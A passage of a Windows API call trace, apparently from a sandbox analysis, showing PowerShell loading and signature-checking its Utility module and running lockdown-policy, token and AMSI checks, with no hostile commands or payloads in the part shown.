ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0159.979] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508bfd0) returned 1 [0159.979] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508bb30, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0159.979] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508bf80) returned 1 [0159.979] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508c060 | out: lpFileInformation=0xafa508c060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0159.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508bf40) returned 1 [0159.980] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508bae0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0159.980] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508ba10, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0159.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508be60) returned 1 [0159.980] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508bf40 | out: lpFileInformation=0xafa508bf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0159.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508be20) returned 1 [0159.980] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508b910, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0159.980] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508bdf0) returned 1 [0159.980] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6c8 [0159.981] GetFileType (hFile=0x6c8) returned 0x1 [0159.981] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508bd60) returned 1 [0159.981] GetFileType (hFile=0x6c8) returned 0x1 [0159.981] WTGetSignatureInfo () returned 0x0 [0160.010] CertDuplicateCertificateContext (pCertContext=0x2386d592840) returned 0x2386d592840 [0160.010] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508be88 | out: phkResult=0xafa508be88*=0x6d8) returned 0x0 [0160.010] RegQueryValueExW (in: hKey=0x6d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508bed8, lpData=0x0, lpcbData=0xafa508bed0*=0x0 | out: lpType=0xafa508bed8*=0x1, lpData=0x0, lpcbData=0xafa508bed0*=0x56) returned 0x0 [0160.010] RegQueryValueExW (in: hKey=0x6d8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508bed8, lpData=0x238004d25c8, lpcbData=0xafa508bed0*=0x56 | out: lpType=0xafa508bed8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508bed0*=0x56) returned 0x0 [0160.010] RegCloseKey (hKey=0x6d8) returned 0x0 [0160.010] CoTaskMemAlloc (cb=0x10) returned 0x2386d61e2c0 [0160.010] CoTaskMemAlloc (cb=0x50) returned 0x2386d3b5eb0 [0160.010] WinVerifyTrust () returned 0x0 [0160.011] CoTaskMemFree (pv=0x2386d3b5eb0) [0160.011] CoTaskMemFree (pv=0x2386d61e2c0) [0160.011] CertFreeCertificateContext (pCertContext=0x2386d592840) returned 1 [0160.011] CloseHandle (hObject=0x6c8) returned 1 [0160.012] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508baa0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0160.012] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508bf80) returned 1 [0160.012] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6c8 [0160.012] GetFileType (hFile=0x6c8) returned 0x1 [0160.012] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508bef0) returned 1 [0160.012] GetFileType (hFile=0x6c8) returned 0x1 [0160.012] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508bf38*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508bf38*=0) returned 0x0 [0160.012] ReadFile (in: hFile=0x6c8, lpBuffer=0x238004d3808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508bfb8, lpOverlapped=0x0 | out: lpBuffer=0x238004d3808*, lpNumberOfBytesRead=0xafa508bfb8*=0x1000, lpOverlapped=0x0) returned 1 [0160.013] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508bf38*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508bf38*=0) returned 0x1000 [0160.013] ReadFile (in: hFile=0x6c8, lpBuffer=0x238004d3808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508bfb8, lpOverlapped=0x0 | out: lpBuffer=0x238004d3808*, lpNumberOfBytesRead=0xafa508bfb8*=0x1000, lpOverlapped=0x0) returned 1 [0160.013] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508bf38*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508bf38*=0) returned 0x2000 [0160.013] ReadFile (in: hFile=0x6c8, lpBuffer=0x238004d3808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508bfb8, lpOverlapped=0x0 | out: lpBuffer=0x238004d3808*, lpNumberOfBytesRead=0xafa508bfb8*=0x1000, lpOverlapped=0x0) returned 1 [0160.013] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508bf38*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508bf38*=0) returned 0x3000 [0160.014] ReadFile (in: hFile=0x6c8, lpBuffer=0x238004d3808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508bfb8, lpOverlapped=0x0 | out: lpBuffer=0x238004d3808*, lpNumberOfBytesRead=0xafa508bfb8*=0x1000, lpOverlapped=0x0) returned 1 [0160.014] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508bf38*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508bf38*=0) returned 0x4000 [0160.014] ReadFile (in: hFile=0x6c8, lpBuffer=0x238004d3808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508bfb8, lpOverlapped=0x0 | out: lpBuffer=0x238004d3808*, lpNumberOfBytesRead=0xafa508bfb8*=0x1000, lpOverlapped=0x0) returned 1 [0160.014] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508bf38*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508bf38*=0) returned 0x5000 [0160.014] ReadFile (in: hFile=0x6c8, lpBuffer=0x238004d3808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508bfb8, lpOverlapped=0x0 | out: lpBuffer=0x238004d3808*, lpNumberOfBytesRead=0xafa508bfb8*=0x298, lpOverlapped=0x0) returned 1 [0160.014] SetFilePointer (in: hFile=0x6c8, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508bf38*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508bf38*=0) returned 0x5298 [0160.015] ReadFile (in: hFile=0x6c8, lpBuffer=0x238004d3808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508bfb8, lpOverlapped=0x0 | out: lpBuffer=0x238004d3808*, lpNumberOfBytesRead=0xafa508bfb8*=0x0, lpOverlapped=0x0) returned 1 [0160.015] CoTaskMemAlloc (cb=0x20c) returned 0x2386d701ac0 [0160.015] GetSystemDirectoryW (in: lpBuffer=0x2386d701ac0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0160.015] CoTaskMemFree (pv=0x2386d701ac0) [0160.015] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xafa508ba80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0160.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508bed0) returned 1 [0160.015] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xafa508bfb0 | out: lpFileInformation=0xafa508bfb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0160.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508be90) returned 1 [0160.015] WldpGetLockdownPolicy () returned 0x0 [0160.015] GetSystemInfo (in: lpSystemInfo=0xafa508c010 | out: lpSystemInfo=0xafa508c010*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0160.016] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508bf18 | out: phkResult=0xafa508bf18*=0x6cc) returned 0x0 [0160.016] RegQueryValueExW (in: hKey=0x6cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xafa508bf68, lpData=0x0, lpcbData=0xafa508bf60*=0x0 | out: lpType=0xafa508bf68*=0x0, lpData=0x0, lpcbData=0xafa508bf60*=0x0) returned 0x2 [0160.016] RegCloseKey (hKey=0x6cc) returned 0x0 [0160.016] CloseHandle (hObject=0x6c8) returned 1 [0160.324] CoCreateGuid (in: pguid=0xafa508c128 | out: pguid=0xafa508c128*(Data1=0x892d2a4c, Data2=0x2513, Data3=0x4afc, Data4=([0]=0xb5, [1]=0x46, [2]=0x1b, [3]=0xec, [4]=0x52, [5]=0x3c, [6]=0x27, [7]=0x16))) returned 0x0 [0160.324] GetCurrentProcess () returned 0xffffffffffffffff [0160.324] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508c048 | out: TokenHandle=0xafa508c048*=0x6d4) returned 1 [0160.325] GetTokenInformation (in: TokenHandle=0x6d4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xafa508c0e8 | out: TokenInformation=0x0, ReturnLength=0xafa508c0e8) returned 0 [0160.325] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2386d6ad2f0 [0160.325] GetTokenInformation (in: TokenHandle=0x6d4, TokenInformationClass=0x8, TokenInformation=0x2386d6ad2f0, TokenInformationLength=0x4, ReturnLength=0xafa508c0e8 | out: TokenInformation=0x2386d6ad2f0, ReturnLength=0xafa508c0e8) returned 1 [0160.325] LocalFree (hMem=0x2386d6ad2f0) returned 0x0 [0160.325] DuplicateTokenEx (in: hExistingToken=0x6d4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xafa508c148 | out: phNewToken=0xafa508c148*=0x59c) returned 1 [0160.325] CheckTokenMembership (in: TokenHandle=0x59c, SidToCheck=0x23800697f18*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xafa508c150 | out: IsMember=0xafa508c150) returned 1 [0160.325] CloseHandle (hObject=0x59c) returned 1 [0160.329] AmsiScanString () returned 0x80070015 [0160.335] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508b780, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0160.335] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508bbd0) returned 1 [0160.336] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508bcb0 | out: lpFileInformation=0xafa508bcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0160.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508bb90) returned 1 [0160.336] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508b730, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0160.336] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508b660, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0160.336] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508bab0) returned 1 [0160.336] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508bb90 | out: lpFileInformation=0xafa508bb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5298)) returned 1 [0160.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508ba70) returned 1 [0160.336] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x105, lpBuffer=0xafa508b560, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0160.336] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508ba40) returned 1 [0160.336] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x59c [0160.337] GetFileType (hFile=0x59c) returned 0x1 [0160.337] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508b9b0) returned 1 [0160.337] GetFileType (hFile=0x59c) returned 0x1 [0160.337] WTGetSignatureInfo () returned 0x0 [0160.355] CertDuplicateCertificateContext (pCertContext=0x2386d593040) returned 0x2386d593040 [0160.355] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508bad8 | out: phkResult=0xafa508bad8*=0x6d0) returned 0x0 [0160.355] RegQueryValueExW (in: hKey=0x6d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508bb28, lpData=0x0, lpcbData=0xafa508bb20*=0x0 | out: lpType=0xafa508bb28*=0x1, lpData=0x0, lpcbData=0xafa508bb20*=0x56) returned 0x0 [0160.356] RegQueryValueExW (in: hKey=0x6d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508bb28, lpData=0x238006bc8c8, lpcbData=0xafa508bb20*=0x56 | out: lpType=0xafa508bb28*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508bb20*=0x56) returned 0x0 [0160.356] RegCloseKey (hKey=0x6d0) returned 0x0 [0160.356] CoTaskMemAlloc (cb=0x10) returned 0x2386d61e1c0 [0160.356] CoTaskMemAlloc (cb=0x50) returned 0x2386d3b63f0 [0160.356] WinVerifyTrust () returned 0x0 [0160.356] CoTaskMemFree (pv=0x2386d3b63f0) [0160.356] CoTaskMemFree (pv=0x2386d61e1c0) [0160.357] CertFreeCertificateContext (pCertContext=0x2386d593040) returned 1 [0160.357] CloseHandle (hObject=0x59c) returned 1 [0160.357] CoCreateGuid (in: pguid=0xafa508baa8 | out: pguid=0xafa508baa8*(Data1=0x65ec8d9, Data2=0xdb9d, Data3=0x4cfe, Data4=([0]=0x9e, [1]=0x62, [2]=0x9c, [3]=0x59, [4]=0x87, [5]=0x96, [6]=0x98, [7]=0xce))) returned 0x0 [0160.764] CoCreateGuid (in: pguid=0xafa508baa8 | out: pguid=0xafa508baa8*(Data1=0x73382e67, Data2=0x883a, Data3=0x41df, Data4=([0]=0xac, [1]=0x70, [2]=0xf7, [3]=0xec, [4]=0xc1, [5]=0xe3, [6]=0x41, [7]=0x54))) returned 0x0 [0160.764] CoCreateGuid (in: pguid=0xafa508baa8 | out: pguid=0xafa508baa8*(Data1=0x7c55901, Data2=0xec86, Data3=0x4828, Data4=([0]=0xb7, [1]=0xce, [2]=0x91, [3]=0x56, [4]=0x65, [5]=0x15, [6]=0xaa, [7]=0x1f))) returned 0x0 [0161.172] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2386d5baf00 [0161.173] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2386d5bb780 [0161.303] CoCreateGuid (in: pguid=0xafa508baa8 | out: pguid=0xafa508baa8*(Data1=0x7044771c, Data2=0x233e, Data3=0x4be8, Data4=([0]=0x8d, [1]=0x91, [2]=0xf9, [3]=0xc4, [4]=0x57, [5]=0x65, [6]=0xb5, [7]=0xd0))) returned 0x0 [0161.477] CoCreateGuid (in: pguid=0xafa508baa8 | out: pguid=0xafa508baa8*(Data1=0x8721c0bb, Data2=0x5be6, Data3=0x468a, Data4=([0]=0x88, [1]=0x80, [2]=0x7, [3]=0x94, [4]=0xa1, [5]=0x9, [6]=0x5, [7]=0xbd))) returned 0x0 [0161.824] CoCreateGuid (in: pguid=0xafa508baa8 | out: pguid=0xafa508baa8*(Data1=0xc2d72f24, Data2=0x6137, Data3=0x4f26, Data4=([0]=0xa6, [1]=0x4f, [2]=0x94, [3]=0xb8, [4]=0xe8, [5]=0x85, [6]=0x1e, [7]=0x96))) returned 0x0 [0161.824] CoCreateGuid (in: pguid=0xafa508baa8 | out: pguid=0xafa508baa8*(Data1=0xcb202edf, Data2=0x9798, Data3=0x4c87, Data4=([0]=0x87, [1]=0xd4, [2]=0x9b, [3]=0x9d, [4]=0xa3, [5]=0x61, [6]=0xae, [7]=0xa3))) returned 0x0 [0161.824] CoCreateGuid (in: pguid=0xafa508baa8 | out: pguid=0xafa508baa8*(Data1=0xa34071b9, Data2=0x3d32, Data3=0x42f6, Data4=([0]=0xb2, [1]=0xec, [2]=0xc4, [3]=0xed, [4]=0xef, [5]=0x80, [6]=0x7c, [7]=0xa2))) returned 0x0 [0161.892] CoCreateGuid (in: pguid=0xafa508baa8 | out: pguid=0xafa508baa8*(Data1=0xe7965ea3, Data2=0xf4ba, Data3=0x488f, Data4=([0]=0x99, [1]=0x35, [2]=0x6c, [3]=0x3e, [4]=0x6e, [5]=0xd3, [6]=0x1a, [7]=0x4))) returned 0x0 [0162.092] CoTaskMemAlloc (cb=0x20e) returned 0x2386d705ca0 [0162.092] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d705ca0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0162.092] CoTaskMemFree (pv=0x2386d705ca0) [0162.154] EtwEventActivityIdControl () returned 0x0 [0162.154] EtwEventActivityIdControl () returned 0x0 [0162.155] EtwEventActivityIdControl () returned 0x0 [0162.236] EtwEventActivityIdControl () returned 0x0 [0162.241] CoTaskMemAlloc (cb=0x20e) returned 0x2386d702de0 [0162.241] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d702de0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0162.241] CoTaskMemFree (pv=0x2386d702de0) [0162.241] EtwEventActivityIdControl () returned 0x0 [0162.241] EtwEventActivityIdControl () returned 0x0 [0162.242] EtwEventActivityIdControl () returned 0x0 [0162.246] EtwEventActivityIdControl () returned 0x0 [0162.246] CoTaskMemAlloc (cb=0x20e) returned 0x2386d704dc0 [0162.246] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d704dc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0162.246] CoTaskMemFree (pv=0x2386d704dc0) [0162.246] EtwEventActivityIdControl () returned 0x0 [0162.246] EtwEventActivityIdControl () returned 0x0 [0162.246] EtwEventActivityIdControl () returned 0x0 [0162.247] EtwEventActivityIdControl () returned 0x0 [0162.247] CoTaskMemAlloc (cb=0x20e) returned 0x2386d705a80 [0162.247] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d705a80, nSize=0x105 | out: lpBuffer="") returned 0x0 [0162.247] CoTaskMemFree (pv=0x2386d705a80) [0162.247] EtwEventActivityIdControl () returned 0x0 [0162.247] EtwEventActivityIdControl () returned 0x0 [0162.247] EtwEventActivityIdControl () returned 0x0 [0162.292] EtwEventActivityIdControl () returned 0x0 [0162.292] CoTaskMemAlloc (cb=0x20e) returned 0x2386d707a60 [0162.292] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d707a60, nSize=0x105 | out: lpBuffer="") returned 0x0 [0162.292] CoTaskMemFree (pv=0x2386d707a60) [0162.293] EtwEventActivityIdControl () returned 0x0 [0162.293] EtwEventActivityIdControl () returned 0x0 [0162.293] EtwEventActivityIdControl () returned 0x0 [0162.293] EtwEventActivityIdControl () returned 0x0 [0162.293] CoTaskMemAlloc (cb=0x20e) returned 0x2386d703ee0 [0162.293] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x2386d703ee0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0162.293] CoTaskMemFree (pv=0x2386d703ee0) [0162.293] EtwEventActivityIdControl () returned 0x0 [0162.293] EtwEventActivityIdControl () returned 0x0 [0162.294] EtwEventActivityIdControl () returned 0x0 [0162.339] EtwEventActivityIdControl () returned 0x0 [0162.408] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508de28 | out: phkResult=0xafa508de28*=0x6d4) returned 0x0 [0162.408] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x0, lpcbData=0xafa508de70*=0x0 | out: lpType=0xafa508de78*=0x1, lpData=0x0, lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.408] RegQueryValueExW (in: hKey=0x6d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508de78, lpData=0x2380085b9d0, lpcbData=0xafa508de70*=0x56 | out: lpType=0xafa508de78*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508de70*=0x56) returned 0x0 [0162.408] RegCloseKey (hKey=0x6d4) returned 0x0 [0162.410] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508de28 | out: phkResult=0xafa508de28*=0x6d4) returned 0x0 [0162.410] RegQueryValueExW (in: hKey=0x6d4, 